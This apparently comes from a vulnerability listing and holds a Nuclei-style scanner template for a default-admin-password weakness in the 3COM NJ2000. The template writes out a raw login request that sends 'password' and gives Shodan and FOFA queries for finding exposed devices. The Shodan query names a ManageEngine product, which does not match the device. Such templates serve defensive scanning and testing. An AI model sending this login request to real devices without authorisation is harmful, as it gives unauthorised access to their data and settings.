3COM NJ2000 contains a default login vulnerability. Default admin login password of 'password' was found. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
shodan: http.title:"ManageEngine Password"
fofa: body="NJ2000"
PoC代码[已公开]
id: 3com-nj2000-default-login
info:
name: 3COM NJ2000 - Default Login
author: daffainfo
severity: high
description: 3COM NJ2000 contains a default login vulnerability. Default admin login password of 'password' was found. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 1
shodan-query: http.title:"ManageEngine Password"
fofa-query: body="NJ2000"
tags: default-login,3com,nj2000,vuln
http:
- raw:
- |
POST /login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
password=password
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>3Com Corporation Web Interface</title>'
- '<frame name="mainFrame" src="blank.html">'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022035fb6f317e951b2ce2d51a71d52c35a4e36018b6374c67413c32f36029e407da022100c5336ba33bebdb7715c1422744909824d1825a23e1d1ae1cd03197afcad11510:922c64590222798bb761d5b6d8e72950